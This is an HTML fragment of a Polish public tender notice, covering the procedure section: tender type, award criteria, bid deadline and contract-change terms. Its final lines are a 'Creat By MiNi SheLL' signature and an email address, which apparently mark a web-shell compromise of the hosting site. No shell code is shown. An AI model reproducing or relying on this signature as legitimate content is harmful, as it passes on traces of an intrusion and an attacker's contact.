Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej Zamawiającego (www.kgkkozienice.pl) informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia - (sporządzone w oparciu o załącznik nr 4 do SIWZ)
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>90</td></tr><tr><td>okres garancji</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający zgodnie z art. 144 ustawy Pzp przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
 zmiany będące następstwem działania organów administracji, przepisów prawa w szczególności: a) zmiana stawki podatku VAT
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 05/05/2017, godzina: 10:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com